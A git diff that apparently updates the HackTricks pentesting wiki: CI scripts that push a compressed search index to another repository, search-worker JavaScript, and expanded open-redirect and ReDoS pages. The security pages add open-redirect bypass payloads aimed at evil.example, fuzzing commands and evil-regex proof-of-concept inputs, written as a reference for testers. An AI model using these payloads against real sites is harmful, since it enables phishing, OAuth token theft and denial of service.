diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml
index 94f5b5b94..f11da8c51 100644
--- a/.github/workflows/build_master.yml
+++ b/.github/workflows/build_master.yml
@@ -43,7 +43,7 @@ jobs:
&& sudo apt update \
&& sudo apt install gh -y
- - name: Publish search index release asset
+ - name: Push search index to hacktricks-searchindex repo
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -51,43 +51,99 @@ jobs:
set -euo pipefail
ASSET="book/searchindex.js"
- TAG="searchindex-en"
- TITLE="Search Index (en)"
+ TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
+ FILENAME="searchindex-en.js"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
- TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+ TOKEN="${PAT_TOKEN}"
if [ -z "$TOKEN" ]; then
- echo "No token available for GitHub CLI" >&2
+ echo "No PAT_TOKEN available" >&2
exit 1
fi
- export GH_TOKEN="$TOKEN"
- # Delete the release if it exists
- echo "Checking if release $TAG exists..."
- if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
- echo "Release $TAG already exists, deleting it..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
- echo "Failed to delete release, trying without cleanup-tag..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
- echo "Warning: Could not delete existing release, will try to recreate..."
- }
- }
- sleep 2 # Give GitHub API a moment to process the deletion
+ # Clone the searchindex repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
+
+ cd /tmp/searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+
+ # Compress the searchindex file
+ cd "${GITHUB_WORKSPACE}"
+ gzip -9 -k -f "$ASSET"
+
+ # Show compression stats
+ ORIGINAL_SIZE=$(wc -c < "$ASSET")
+ COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+ RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+ echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+
+ # Copy the .gz version to the searchindex repo
+ cd /tmp/searchindex-repo
+ cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+
+ # Stage the updated file
+ git add "${FILENAME}.gz"
+
+ # Commit and push with retry logic
+ if git diff --staged --quiet; then
+ echo "No changes to commit"
else
- echo "Release $TAG does not exist, proceeding with creation..."
+ TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+ git commit -m "Update searchindex files - ${TIMESTAMP}"
+
+ # Retry push up to 20 times with pull --rebase between attempts
+ MAX_RETRIES=20
+ RETRY_COUNT=0
+ while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+ if git push origin master; then
+ echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+ break
+ else
+ RETRY_COUNT=$((RETRY_COUNT + 1))
+ if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+ echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+
+ # Try normal rebase first
+ if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+ echo "Rebase successful, retrying push..."
+ else
+ # If rebase fails due to divergent histories (orphan branch reset), re-clone
+ if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+ echo "Detected history rewrite, re-cloning repository..."
+ cd /tmp
+ rm -rf searchindex-repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+ cd searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+
+ # Re-copy the .gz version
+ cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+
+ git add "${FILENAME}.gz"
+ TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+ git commit -m "Update searchindex files - ${TIMESTAMP}"
+ echo "Re-cloned and re-committed, will retry push..."
+ else
+ echo "Rebase failed for unknown reason, retrying anyway..."
+ fi
+ fi
+
+ sleep 1
+ else
+ echo "Failed to push after $MAX_RETRIES attempts"
+ exit 1
+ fi
+ fi
+ done
fi
- # Create new release (with force flag to overwrite if deletion failed)
- gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
- echo "Failed to create release, trying with force flag..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
- sleep 2
- gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
- }
+ echo "Successfully pushed searchindex files"
# Login in AWs
diff --git a/.github/workflows/translate_all.yml b/.github/workflows/translate_all.yml
index b0444f9a7..59b1470c3 100644
--- a/.github/workflows/translate_all.yml
+++ b/.github/workflows/translate_all.yml
@@ -129,7 +129,7 @@ jobs:
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- - name: Publish search index release asset
+ - name: Push search index to hacktricks-searchindex repo
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -137,31 +137,93 @@ jobs:
set -euo pipefail
ASSET="book/searchindex.js"
- TAG="searchindex-${BRANCH}"
- TITLE="Search Index (${BRANCH})"
+ TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
+ FILENAME="searchindex-${BRANCH}.js"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
- TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+ TOKEN="${PAT_TOKEN}"
if [ -z "$TOKEN" ]; then
- echo "No token available for GitHub CLI" >&2
+ echo "No PAT_TOKEN available" >&2
exit 1
fi
- export GH_TOKEN="$TOKEN"
- # Delete the release if it exists
- if gh release view "$TAG" >/dev/null 2>&1; then
- echo "Release $TAG already exists, deleting it..."
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
- fi
+ # Clone the searchindex repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
- # Create new release
- gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY"
+ # Compress the searchindex file
+ gzip -9 -k -f "$ASSET"
+
+ # Show compression stats
+ ORIGINAL_SIZE=$(wc -c < "$ASSET")
+ COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+ RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+ echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+
+ # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js)
+ cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz"
+
+ # Commit and push with retry logic
+ cd /tmp/searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+ git add "${FILENAME}.gz"
+
+ if git diff --staged --quiet; then
+ echo "No changes to commit"
+ else
+ git commit -m "Update ${FILENAME} from hacktricks-cloud build"
+
+ # Retry push up to 20 times with pull --rebase between attempts
+ MAX_RETRIES=20
+ RETRY_COUNT=0
+ while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+ if git push origin master; then
+ echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+ break
+ else
+ RETRY_COUNT=$((RETRY_COUNT + 1))
+ if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+ echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+
+ # Try normal rebase first
+ if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+ echo "Rebase successful, retrying push..."
+ else
+ # If rebase fails due to divergent histories (orphan branch reset), re-clone
+ if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+ echo "Detected history rewrite, re-cloning repository..."
+ cd /tmp
+ rm -rf searchindex-repo
+ git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+ cd searchindex-repo
+ git config user.name "GitHub Actions"
+ git config user.email "github-actions@github.com"
+
+ # Re-copy ONLY the .gz version (no uncompressed .js)
+ cp "${ASSET}.gz" "${FILENAME}.gz"
+
+ git add "${FILENAME}.gz"
+ git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build"
+ echo "Re-cloned and re-committed, will retry push..."
+ else
+ echo "Rebase failed for unknown reason, retrying anyway..."
+ fi
+ fi
+
+ sleep 1
+ else
+ echo "Failed to push after $MAX_RETRIES attempts"
+ exit 1
+ fi
+ fi
+ done
+ fi
- # Login in AWs
+ # Login in AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md
index 2cbc9d4e6..c97bf611c 100644
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@@ -7,12 +7,23 @@
### Redirect to localhost or arbitrary domains
+- If the app “allows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target:
+ - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
+ - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
+ - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
+ - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only “subdomains of X” are allowed but host resolution still points to 127.0.0.1.
+- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
+ - //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
+- Userinfo tricks defeat contains/startswith checks against trusted hosts:
+ - https://trusted.tld@attacker.tld/ → browser navigates to attacker.tld but simple string checks “see” trusted.tld.
+- Backslash parsing confusion between frameworks/browsers:
+ - https://trusted.tld\@attacker.tld → some backends treat “\” as a path char and pass validation; browsers normalize to “/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches.
{{#ref}}
ssrf-server-side-request-forgery/url-format-bypass.md
{{#endref}}
-### Open Redirect to XSS
+### Modern open-redirect to XSS pivots
```bash
#Basic payload, javascript code is executed after "javascript:"
@@ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29
";alert(0);//
```
+
+More modern URL-based bypass payloads
+
+```text
+# Scheme-relative (current scheme is reused)
+//evil.example
+
+# Credentials (userinfo) trick
+https://trusted.example@evil.example/
+
+# Backslash confusion (server validates, browser normalizes)
+https://trusted.example\@evil.example/
+
+# Schemeless with whitespace/control chars
+evil.example%00
+%09//evil.example
+
+# Prefix/suffix matching flaws
+https://trusted.example.evil.example/
+https://evil.example/trusted.example
+
+# When only path is accepted, try breaking absolute URL detection
+/\\evil.example
+/..//evil.example
+```
+
+
+
## Open Redirect uploading svg files
```html
@@ -173,18 +212,78 @@ exit;
?>
```
+## Hunting and exploitation workflow (practical)
+
+- Single URL check with curl:
+
+```bash
+curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
+```
+
+- Discover and fuzz likely parameters at scale:
+
+
+Example end-to-end commands:
+
+```bash
+# 1) Gather historical URLs, keep those with common redirect params
+cat domains.txt \
+ | gau --o urls.txt # or: waybackurls / katana / hakrawler
+
+# 2) Grep common parameters and normalize list
+rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
+ | sed 's/\r$//' | sort -u > candidates.txt
+
+# 3) Use OpenRedireX to fuzz with payload corpus
+cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
+
+# 4) Manually verify interesting hits
+grep -Ei '30[1237]|^location:' results.txt
+```
+
+
+
+- Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect.
+
+- Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.
+
+{{#ref}}
+../network-services-pentesting/pentesting-web/nextjs.md
+{{#endref}}
+
+- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide:
+
+{{#ref}}
+./oauth-to-account-takeover.md
+{{#endref}}
+
+- Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for:
+
+```html
+<meta http-equiv="refresh" content="0;url=//evil.example">
+<script>window.location = "//evil.example"</script>
+```
+
## Tools
- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
+- OpenRedireX – fuzzer for detecting open redirects. Example:
-## Resources
+```bash
+# Install
+git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
-- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.
+# Fuzz a list of candidate URLs (use FUZZ as placeholder)
+cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
+```
+
+## References
+
+- In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect you can find fuzzing lists.
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
-
+- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
+- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
{{#include ../banners/hacktricks-training.md}}
-
-
diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md
index 21675cc90..15bccf507 100644
--- a/src/pentesting-web/regular-expression-denial-of-service-redos.md
+++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md
@@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad
## The Problematic Regex Naïve Algorithm
-**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
+**Check the details in [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
+
+### Engine behavior and exploitability
+
+- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
+- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.
## Evil Regexes
@@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
- ([a-zA-Z]+)\*
- (a|aa)+
- (a|a?)+
-- (.\*a){x} for x > 10
+- (.*a){x} for x > 10
All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
+### Practical recipe to build PoCs
+
+Most catastrophic cases follow this shape:
+
+- Prefix that gets you into the vulnerable subpattern (optional).
+- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
+- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).
+
+Minimal examples:
+
+- `(a+)+$` vs input `"a"*N + "!"`
+- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`
+
+Increase N and observe super‑linear growth.
+
+#### Quick timing harness (Python)
+
+```python
+import re, time
+pat = re.compile(r'(\w*_)\w*$')
+for n in [2**k for k in range(8, 15)]:
+ s = 'v' + '_'*n + '!'
+ t0=time.time(); pat.search(s); dt=time.time()-t0
+ print(n, f"{dt:.3f}s")
+```
+
## ReDoS Payloads
### String Exfiltration via ReDoS
@@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (
- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=)((.*)*)*salt$`
- Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
-- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!`
+- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!`
- In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
### ReDoS Controlling Input and Regex
@@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
*/
```
+### Language/engine notes for attackers
+
+- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced.
+- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
+- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
+- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.
+
## Tools
- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
+ - Find vulnerable regexes and auto‑generate evil inputs. Examples:
+ - `pip install regexploit`
+ - Analyze one pattern interactively: `regexploit`
+ - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/`
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
+- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector)
+ - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
+- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector)
+ - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.
+
+> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS.
## References
-- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
+- [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
-- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
+- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html)
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
+- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
+- Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2)
{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index dd6a54063..8c4e6faf8 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
-> - **How can I a page of HackTricks?**
+> - **How can I reference a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
diff --git a/theme/ht_searcher.js b/theme/ht_searcher.js
index 6b105f263..9548e9173 100644
--- a/theme/ht_searcher.js
+++ b/theme/ht_searcher.js
@@ -6,34 +6,63 @@
*/
(() => {
- "use strict";
+ "use strict";
+
+ /* ───────────── 0. helpers (main thread) ───────────── */
+ const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); };
+
+ /* ───────────── 1. Web‑Worker code ─────────────────── */
+ const workerCode = `
+ self.window = self;
+ self.search = self.search || {};
+ const abs = p => location.origin + p;
+
+ /* 1 — elasticlunr */
+ try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
+ catch { importScripts(abs('/elasticlunr.min.js')); }
+
+ /* 2 — decompress gzip data */
+ async function decompressGzip(arrayBuffer){
+ if(typeof DecompressionStream !== 'undefined'){
+ /* Modern browsers: use native DecompressionStream */
+ const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip'));
+ const decompressed = await new Response(stream).arrayBuffer();
+ return new TextDecoder().decode(decompressed);
+ } else {
+ /* Fallback: use pako library */
+ if(typeof pako === 'undefined'){
+ try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); }
+ catch(e){ throw new Error('pako library required for decompression: '+e); }
+ }
+ const uint8Array = new Uint8Array(arrayBuffer);
+ const decompressed = pako.ungzip(uint8Array, {to: 'string'});
+ return decompressed;
+ }
+ }
- /* ───────────── 0. helpers (main thread) ───────────── */
- const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); };
-
- /* ───────────── 1. Web‑Worker code ─────────────────── */
- const workerCode = `
- self.window = self;
- self.search = self.search || {};
- const abs = p => location.origin + p;
-
- /* 1 — elasticlunr */
- try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
- catch { importScripts(abs('/elasticlunr.min.js')); }
-
- /* 2 — load a single index (remote → local) */
+ /* 3 — load a single index (remote → local) */
async function loadIndex(remote, local, isCloud=false){
let rawLoaded = false;
if(remote){
+ /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */
try {
const r = await fetch(remote,{mode:'cors'});
- if (!r.ok) throw new Error('HTTP '+r.status);
- importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'})));
- rawLoaded = true;
- } catch(e){ console.warn('remote',remote,'failed →',e); }
+ if (r.ok) {
+ const compressed = await r.arrayBuffer();
+ const text = await decompressGzip(compressed);
+ importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'})));
+ rawLoaded = true;
+ console.log('Loaded compressed from GitHub:',remote);
+ }
+ } catch(e){ console.warn('compressed GitHub',remote,'failed →',e); }
}
+ /* If remote (GitHub) failed, fall back to local uncompressed file */
if(!rawLoaded && local){
- try { importScripts(abs(local)); rawLoaded = true; }
+ try {
+ importScripts(abs(local));
+ rawLoaded = true;
+ console.log('Loaded local fallback:',local);
+ }
catch(e){ console.error('local',local,'failed →',e); }
}
if(!rawLoaded) return null; /* give up on this index */
@@ -61,151 +90,159 @@
return local ? loadIndex(null, local, isCloud) : null;
}
+
+ let built = [];
+ const MAX = 30, opts = {bool:'AND', expand:true};
+
+ self.onmessage = async ({data}) => {
+ if(data.type === 'init'){
+ const lang = data.lang || 'en';
+ const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master';
- (async () => {
- const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
- const lang = htmlLang.split('-')[0];
- const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download';
- const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download';
+ /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */
+ const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz']));
+ const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz']));
- const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
- const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
+ const MAIN_REMOTE_SOURCES = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
+ const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
- const MAIN_REMOTE_SOURCES = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`);
- const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`);
-
- const indices = [];
- const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js', false); if(main) indices.push(main);
- const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js', true ); if(cloud) indices.push(cloud);
-
- if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
-
- /* build index objects */
- const built = indices.map(d => ({
- idx : elasticlunr.Index.load(d.json),
- urls: d.urls,
- cloud: d.cloud,
- base: d.cloud ? 'https://cloud.hacktricks.wiki/' : ''
- }));
-
- postMessage({ready:true});
- const MAX = 30, opts = {bool:'AND', expand:true};
-
- self.onmessage = ({data:q}) => {
- if(!q){ postMessage([]); return; }
-
- const all = [];
- for(const s of built){
- const res = s.idx.search(q,opts);
- if(!res.length) continue;
- const max = res[0].score || 1;
- res.forEach(r => {
- const doc = s.idx.documentStore.getDoc(r.ref);
- all.push({
- norm : r.score / max,
- title: doc.title,
- body : doc.body,
- breadcrumbs: doc.breadcrumbs,
- url : s.base + s.urls[r.ref],
- cloud: s.cloud
+ const indices = [];
+ const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js', false); if(main) indices.push(main);
+ const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js', true ); if(cloud) indices.push(cloud);
+ if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
+
+ /* build index objects */
+ built = indices.map(d => ({
+ idx : elasticlunr.Index.load(d.json),
+ urls: d.urls,
+ cloud: d.cloud,
+ base: d.cloud ? 'https://cloud.hacktricks.wiki/' : ''
+ }));
+
+ postMessage({ready:true});
+ return;
+ }
+
+ const q = data.query || data;
+ if(!q){ postMessage([]); return; }
+
+ const all = [];
+ for(const s of built){
+ const res = s.idx.search(q,opts);
+ if(!res.length) continue;
+ const max = res[0].score || 1;
+ res.forEach(r => {
+ const doc = s.idx.documentStore.getDoc(r.ref);
+ all.push({
+ norm : r.score / max,
+ title: doc.title,
+ body : doc.body,
+ breadcrumbs: doc.breadcrumbs,
+ url : s.base + s.urls[r.ref],
+ cloud: s.cloud
+ });
});
- });
- }
- all.sort((a,b)=>b.norm-a.norm);
- postMessage(all.slice(0,MAX));
- };
- })();
- `;
+ }
+ all.sort((a,b)=>b.norm-a.norm);
+ postMessage(all.slice(0,MAX));
+ };
+ `;
+
+ /* ───────────── 2. spawn worker ───────────── */
+ const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
+
+ /* ───────────── 2.1. initialize worker with language ───────────── */
+ const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
+ const lang = htmlLang.split('-')[0];
+ worker.postMessage({type: 'init', lang: lang});
+
+ /* ───────────── 3. DOM refs ─────────────── */
+ const wrap = document.getElementById('search-wrapper');
+ const bar = document.getElementById('searchbar');
+ const list = document.getElementById('searchresults');
+ const listOut = document.getElementById('searchresults-outer');
+ const header = document.getElementById('searchresults-header');
+ const icon = document.getElementById('search-toggle');
+
+ const READY_ICON = icon.innerHTML;
+ icon.textContent = '⏳';
+ icon.setAttribute('aria-label','Loading search …');
+ icon.setAttribute('title','Search is loading, please wait...');
- /* ───────────── 2. spawn worker ───────────── */
- const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
-
- /* ───────────── 3. DOM refs ─────────────── */
- const wrap = document.getElementById('search-wrapper');
- const bar = document.getElementById('searchbar');
- const list = document.getElementById('searchresults');
- const listOut = document.getElementById('searchresults-outer');
- const header = document.getElementById('searchresults-header');
- const icon = document.getElementById('search-toggle');
-
- const READY_ICON = icon.innerHTML;
- icon.textContent = '⏳';
- icon.setAttribute('aria-label','Loading search …');
- icon.setAttribute('title','Search is loading, please wait...');
-
- const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
- let debounce, teaserCount=0;
-
